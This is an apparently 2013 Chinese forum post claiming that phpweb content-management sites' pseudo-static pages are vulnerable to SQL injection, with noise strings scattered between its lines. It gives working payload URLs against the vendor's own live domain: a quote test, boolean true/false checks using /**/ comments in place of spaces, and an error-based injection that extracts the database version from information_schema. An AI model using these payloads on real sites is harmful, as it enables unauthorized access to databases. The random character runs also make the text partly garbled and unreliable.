phpweb所有的整站程序伪静态页面都存在sql注入
6 X0 D# Y1 p C! c/ N/ i+ y8 v" V: Y: u+ H, i
主站:http://phpweb.net/3 P* y( E: C: W
加’检测:
! }: J& f5 o2 q7 U- D' m- ~, Q 1 y* ?( e3 T0 j# ?
http://www.phpweb.net/down/html/?772′.html% @0 F- @8 Z" R4 N
, ? }" S6 p3 L5 A0 n3 V s+ O
出错
2 y: L4 j) M X) d+ O% f+ b6 E存在注入。
$ S. x& r) q1 c. l不能用空格,只能用/*罗
6 T) A7 |& A9 F4 ~ Mhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常% Q5 g( N! Z$ T% n
4 e6 M, N, ^" C: `1 o8 \http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.& i1 o* r q! c4 ~
爆数据库版本:
( x8 u' K* u9 _' o( }, [
, j6 {- y# A B2 Y: g8 x( N?
" c' g$ K$ t* A1' r/ Q# G7 _% U; b$ d# R& s: w
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
+ A9 B% R8 p3 k8 z: D* W5 U更新日期: 2013-01-03 13:39:50
9 E/ U* _8 D+ L* A |
发表于 2013-1-4 19:46:42
收藏
支持
反对